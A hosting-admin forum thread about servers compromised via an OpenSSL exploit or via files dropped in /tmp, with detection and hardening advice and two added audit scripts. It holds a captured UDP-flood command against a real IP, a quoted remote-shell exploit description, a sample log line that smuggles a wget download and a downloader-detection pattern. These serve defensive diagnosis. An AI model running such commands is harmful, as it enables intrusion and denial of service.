OpenSSL Hack Vulnerability

matthewdavis

Well-Known Member
Jun 26, 2003
NC, USA
This is really a fairly well-known bug. But I do believe our servers are still affected by it due to the fact I have 2 servers that have been hit by this bug. So any insight as to why our servers were hit by this would be greatly appreciated.

I noticed some fishy directories in /tmp and /usr/tmp. A few names of these directories are .inoe, .xfs, .n, .a, and a directory with a bunch of spaces. And inside these directories are eggdrop bots and programs to hide processes so a normal top or ps output doesn't show anything suspicious.

All these files are owned by 'nobody' which leads me to believe they came in through the web server. Plus on one of my servers they left behind a tool called 'scanSSL' which looks for servers with OpenSSL 0.9.6d and older. I keep my server up-to-date with Red Hat errata packages and cPanel updates, and yet my server is still vulnerable.

And I'd be happy to stand corrected about any of this. If I overlooked something, please tell me.

But I'd suggest everyone check your /tmp, /var/tmp and /usr/tmp directories for any suspicious directories.

SSH into your machine and 'ls -a /tmp' and 'ls -a /usr/tmp' and so on.


matthewdavis

Well-Known Member
Jun 26, 2003
NC, USA
Has anyone encountered this? Does anyone have anything suspicious in their /tmp, /usr/tmp, or /var/tmp directories?

Do a 'ls -alR /var/tmp' or 'ls -alR /usr/tmp' or 'ls -alR /tmp' and if you see anything like eggdrops or scripts, or irc servers, then it's possible you've been hacked.


Curious Too

Well-Known Member
Aug 31, 2001
cPanel Access Level
Root Administrator
What evidence do you have that this was an OpenSSL exploit? I have had files dropped in the tmp directory via pMachine, GreyMatter, Gallery and a poorly coded Movable Type template.


matthewdavis

Well-Known Member
Jun 26, 2003
NC, USA
Well, because one of my servers had a few scripts, 'scanSSL' as one of them, and a script which would run nmap and find IPs running web servers. Plus one of them had the 'openssl-too-open.c' program there.

And from the openssl-too-open.c file -
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis.
So I can only assume it was using an SSL exploit. Currently I have a hacker I haven't cracked down on yet because he's just running a simple eggdrop with no dangerous scripts. And I'm monitoring the activity and how he restarts the eggdrop bot.

I'll post my results when I have some.


techark

Well-Known Member
May 22, 2002
90% of the time they drop these in via a bad script on a site somewhere.

cd /usr/local/apache/domlogs and type grep wget ./*

Lots of times you find the account they came in through.

It is a good idea to make your tmp dir non-executable to keep them from running the scripts there.
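
As an added example (not from the thread), the domlog check above turned into a small script: it runs over a few constructed Apache combined-format log lines and prints the client IP, status and request for any request that carries a download tool name such as wget, curl or fetch. The addresses and hostnames in the sample are invented placeholders.

```shell
#!/bin/sh
# Added example, not from the thread: find requests in Apache domlogs that
# carry a download-tool name (the pattern techark greps for with "grep wget").
# The log lines below are constructed samples in Apache "combined" format;
# the IP addresses and hostnames are invented placeholders.
SAMPLE_LOG='192.0.2.10 - - [12/Jun/2004:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Jun/2004:10:02:15 +0000] "GET /gallery/view.php?file=cd%20/tmp;wget%20http://example.invalid/udp.pl HTTP/1.0" 200 312 "-" "libwww-perl/5.79"
192.0.2.10 - - [12/Jun/2004:10:03:40 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# Print one line per suspicious request: client IP, HTTP status, request.
# Only the request string (between the first pair of double quotes) is
# searched, so a user agent such as "Wget/1.9" does not trigger a match.
find_downloader_requests() {
    printf '%s\n' "$1" | awk '
        {
            req = $0
            sub(/^[^"]*"/, "", req)   # drop everything up to the opening quote
            sub(/".*$/, "", req)      # drop the closing quote and the rest
            lreq = tolower(req)
            # tool name as a whole word; works for raw and %20-encoded forms
            if (lreq ~ /(^|[^a-z])(wget|curl|fetch|lynx)([^a-z]|$)/)
                print $1 " " $9 " " req
        }'
}

# Number of suspicious requests in a log, for scripting and checks.
count_downloader_requests() {
    find_downloader_requests "$1" | wc -l | tr -d ' '
}

find_downloader_requests "$SAMPLE_LOG"
```

On a live box the same function can be fed with `cat /usr/local/apache/domlogs/*`; the first field of each hit then points at the account the attacker came in through.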


carock

Well-Known Member
Sep 25, 2002
St. Charles, MO
Lock Icon wrong too...

According to the CERT Advisory, and Red Hat errata, the version of OpenSSL I had installed on my cPanel server was vulnerable.

Yet, there is no lock icon at the top of the WHM News on my box.

Who's responsible for making those?

When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from Red Hat.

Chuck


PbG

Well-Known Member
Mar 11, 2003
Re: Lock Icon wrong too...

Until the release number changes the icon will reflect 0.9.6 as secure, but as long as the updates occur I would not worry about the difference between the icon showing 0.9.6b-35.7 and merely 0.9.6/0.9.6b.

Originally posted by carock
According to the CERT Advisory, and Red Hat errata, the version of OpenSSL I had installed on my cPanel server was vulnerable.

Yet, there is no lock icon at the top of the WHM News on my box.

Who's responsible for making those?

When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from Red Hat.

Chuck


gundamz

Well-Known Member
Mar 27, 2002
I am currently having this problem now. What can I do to stop this hacker?

eth00

Well-Known Member
PartnerNOC
Mar 30, 2003
NC
cPanel Access Level
Root Administrator
The first and biggest thing is to secure your /tmp and make it non-executable. A lot of stuff comes in through /tmp and is executed. If you do a search you should be able to find some good information. You also should run chkrootkit to make sure nothing else happened.

gundamz

Well-Known Member
Mar 27, 2002
What is the safest permission we should give for "tmp"?

Website Rob

Well-Known Member
Mar 23, 2002
Alberta, Canada
cPanel Access Level
Root Administrator
Looking at it is the first thing that comes to my mind. ;)

If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.

BeerUser

Active Member
Apr 16, 2004
LABEL=/                 /                       ext3    defaults,usrquota        1 1
LABEL=/boot             /boot                   ext3    defaults        1 2
none                    /dev/pts                devpts  gid=5,mode=620  0 0
none                    /proc                   proc    defaults        0 0
none                    /dev/shm                tmpfs   defaults        0 0
/dev/hda2               swap                    swap    defaults        0 0
/dev/fd0                /mnt/floppy             auto    noauto,owner,kudzu 0 0
is what I have when I pico the file...

How come tmp isn't listed at all.. I did use /scripts/securetmp I think it was.

gundamz

Well-Known Member
Mar 27, 2002
Originally posted by Website Rob
Looking at it is the first thing that comes to my mind. ;)

If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.
Does /scripts/securetmp do the same trick and secure my tmp?

Website Rob

Well-Known Member
Mar 23, 2002
Alberta, Canada
cPanel Access Level
Root Administrator
If 'tmp' does not have its own partition, then I would use that script as it does somewhat secure it -- which is definitely better than not doing anything.

gundamz

Well-Known Member
Mar 27, 2002
ok..

tvcnet

Well-Known Member
PartnerNOC
Aug 15, 2003
San Diego
cPanel Access Level
DataCenter Provider
tmp Secured but hacks continue

Hi folks.
For those of you who feel safe after making your /tmp directory non-executable.

We've had it set non-executable for months and one morning found the following in /tmp "running" and happily DoS'ing another host.

nobody 1073 30041 0 16:21 ? 00:00:00 lpd
nobody 1089 1 0 16:21 ? 00:00:00 /bin/sh
nobody 9451 1073 0 17:04 ? 00:00:00 sh -c echo "(`whoami`@`uname -n`:`pwd`)"; /
nobody 9457 9451 0 17:04 ? 00:00:00 /bin/sh
nobody 9689 10678 0 17:05 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
mysql 9961 5169 0 17:06 ? 00:00:02 /usr/sbin/mysqld --basedir --datadirvar
mysql 10323 5169 0 17:07 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 11992 10678 0 17:15 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
nobody 12612 9457 22 17:16 ? 00:52:06 perl /tmp/udp.pl 69.64.34.214 6000 1
mysql 13555 5169 0 17:20 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 13558 9689 0 17:20 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 13559 13558 21 17:20 ? 00:49:13 /usr/bin/perl udp.pl 69.64.34.214 6000 1
mysql 14053 5169 0 17:21 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 14055 11992 0 17:21 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 14057 14055 21 17:21 ? 00:48:34 /usr/bin/perl udp.pl 69.64.34.214 6000 1
nobody 16595 10678 0 17:30 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
mysql 16604 5169 0 17:30 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 16608 16595 0 17:30 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 16609 16608 21 17:30 ? 00:46:04 /usr/bin/perl udp.pl 69.64.34.214 6000 1


Note this command that somehow gets past the non-executable setting:
sh -c cd /dev/shm;/usr/bin/perl udp.pl

I can assure you that no one has SSH access on our server other than a few trusted clients.

What do you all make of this?

Thanks,
Jim
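
An added example (not from the thread or from cPanel) that covers both Website Rob's /etc/fstab advice and this post: a shell audit of an fstab or /proc/mounts listing that flags /tmp, /var/tmp and /dev/shm when they are mounted without noexec, nosuid or nodev, or have no entry of their own. The mount listing it runs over is constructed. The comments also spell out why noexec on /tmp alone did not stop `perl udp.pl`.

```shell
#!/bin/sh
# Added example, not from the thread or from cPanel: audit an /etc/fstab or
# /proc/mounts listing for scratch filesystems that are still executable.
# Both files use the same six fields (device, mount point, type, options,
# dump, pass), so one function serves the fstab check and the /dev/shm case.
# Caveat: noexec only blocks direct execution (./udp.pl). "perl udp.pl" still
# runs because the interpreter lives on an executable filesystem, so noexec is
# a hurdle for dropped binaries, not a fix for script-based abuse.

# Constructed sample in /proc/mounts form: /tmp is hardened, /dev/shm is a
# plain rw tmpfs (the gap in the post above), and /var/tmp has no entry.
SAMPLE_MOUNTS='/dev/hda1 / ext3 rw,usrquota 0 0
/dev/hda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
none /dev/shm tmpfs rw 0 0
none /proc proc rw 0 0'

# Print one line per scratch mount missing noexec, nosuid or nodev, and one
# per scratch directory with no entry at all (it then inherits the options
# of /). Exit status 0 means nothing was flagged.
audit_scratch_mounts() {
    printf '%s\n' "$1" | awk '
        BEGIN {
            nwant = split("noexec nosuid nodev", want, " ")
            ndir  = split("/tmp /var/tmp /dev/shm", dir, " ")
            bad = 0
        }
        $2 == "/tmp" || $2 == "/var/tmp" || $2 == "/dev/shm" {
            seen[$2] = 1
            n = split($4, opts, ",")
            for (k in have) delete have[k]
            for (i = 1; i <= n; i++) have[opts[i]] = 1
            missing = ""
            for (j = 1; j <= nwant; j++)
                if (!(want[j] in have)) missing = missing " " want[j]
            if (missing != "") { print $2 ": missing" missing; bad = 1 }
        }
        END {
            for (j = 1; j <= ndir; j++)
                if (!(dir[j] in seen)) { print dir[j] ": no separate entry"; bad = 1 }
            exit bad
        }'
}

audit_scratch_mounts "$SAMPLE_MOUNTS" \
    || echo "add noexec,nosuid,nodev to those lines in /etc/fstab, then mount -a"
```

Run it against the real box with `audit_scratch_mounts "$(cat /proc/mounts)"`; /dev/shm is the entry most often forgotten because it is mounted by default rather than from a line the admin wrote.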